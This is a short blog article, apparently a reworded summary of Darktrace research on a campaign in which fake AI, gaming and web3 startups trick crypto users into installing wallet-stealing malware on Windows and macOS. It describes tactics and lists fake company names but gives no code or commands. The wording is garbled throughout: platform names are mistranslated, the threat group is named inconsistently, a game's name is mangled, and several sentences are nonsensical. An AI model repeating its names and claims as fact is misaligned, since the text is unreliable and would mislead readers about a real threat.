Darktrace Research reveals an ongoing social engineering campaign targeting crypto users through fake startups. Scammers use spoofed social media accounts to impersonate AI, gaming, and web3 companies.
Project Documentation is hosted on legitimate platforms such as Notion and GitHub. This campaign has been changing since December 2024 since its global target of Web3 employees.
Fake companies use legitimate platforms to build a trustworthy presence
Threat actors create fake startups with software themes for AI, gaming and video conferencing. The Web3 and social media companies’ facades specifically support target cryptocurrency users. These operations typically use compromised X accounts with verification to contact the victim.
Attackers use legal platforms such as concepts, medium, GitHub for documents. Professional websites include employee profiles, product blogs, white papers and development roadmap. X accounts appear to be compromised because they have a high number of followers that increase the appearance of legitimacy.
The scammer remains active on social media accounts that post software development updates. Product marketing content is shared regularly while campaigns run across the platform. Eternal Attenuation Blockchain Game has created fake meeting presentation photos for reliability.
The attackers changed the Italian exhibit photos and appeared as a company presentation. Intermediate hosts blog posts about fake software products and corporate development. The concept includes a detailed product roadmap and comprehensive employee list information.
Scammers changing photos from Italian exhibitions: Source
The GitHub repository features aspects of technical software using stolen open source projects. The code name has been changed to make the repository look unique and original. Company registration information from Company House is linked to companies with similar names.
GitBook details company information and lists fake investor partnerships for reliability. Gameplay images stolen from zombies in the game will be displayed as eternal destructive content. Some fake companies will set up merchandise stores to complete the business facade.
These combined elements create the emergence of compelling startups and increase the success rate of infection. Victims will be contacted via X-messages, telegrams, or inconsistencies from employees. Fake workers provide cryptocurrency payments for software testing participation.
Malware targeting Crypto Wallet users on both Windows and Macos
The Windows version is distributed via electronic apps that require registration codes to high-performing employees. After the code is entered via social media messaging, the bin is downloaded by the user. The CloudFlare verification screen appears before malware execution on the target system.
Malware collects system profiles in username, CPU details, RAM, and graphics. The MAC address and system UUID are collected during the pre-reconnaissance phase. The token-based authentication mechanism uses tokens derived from the application launcher URL.
Stolen code signing certificates increase software legitimacy and avoid security detection. Companies such as Jiangyin Fengyuan Electronics Co. and PaperBucketMDB APS Certificates were used. Python is retrieved and saved in a temporary directory for command execution.
The MACOS distribution is released as a DMG file containing BASH scripts and binaries. The script uses obfuscation techniques such as Base64 encoding and XOR encryption. Applescript mounts malware and automatically runs executables from temporary directories.
MacOS malware performs anti-analytic checks for QEMU, VMware, and Docker environments. Atomic Stealer targets browser data, crypto wallets, cookies, and document files. The stolen data is compressed and sent to the server via a posting request.
Additional BASH scripts establish persistence through the launch agent configuration upon login. Malware continuously logs active application usage and window information. User interaction timestamps are recorded and sent periodically to the collection server.
Both versions target cryptocurrency wallet data specifically for theft operations. Several fake companies distribute the same malware with different branding and themes.
An extensive list of fake companies identified across multiple platforms
Darktrace has revealed several fake companies running through this social engineering campaign. Pollen AI uses X accounts and other websites to impersonate a co-creation tool. Buzzu uses the same logo and code as pollen, but runs under different branding.
CloudSign is reported to provide document signing platform services to business consumers. SWOX is the next generation social network for the Web3 space. Klastai is closely related to pollen accounts and sites with the same branding.
WASPER uses the same logo and GitHub code as pollen from various regions. Lunelior is operated through a variety of websites that specifically provide services to different groups of users. Beesync was operated as a Buzzu alias before the rebrand in January 2025.
Slax hosts social media and AI-centric sites on multiple websites. Solune reaches users through activities and use of messaging apps on social media platforms. Eternal Decay is a blockchain gaming company with presentations for synthetic conferences.
Dexis is the same brand as SWOX and shares the same user base. Nexvoo has multiple domains and social media platform management. Nexloop has been rebranded to Nexoracore by renaming its GitHub repository.
Yondaai targets social media site users as well as a variety of website domain users. Every business has a professional aspect through real platform integration procedures. CrazyEvil’s Traffic Group has been running a campaign like this since 2021.
The recorded future approximates Crazyville’s millions of revenues from malicious activities. The group is said to be behind attacks on crypto users, influencers and debt experts. The campaign illustrates the broader efforts to make legitimate business appearances.
Discover more from Earlybirds Invest
Subscribe to get the latest posts sent to your email.
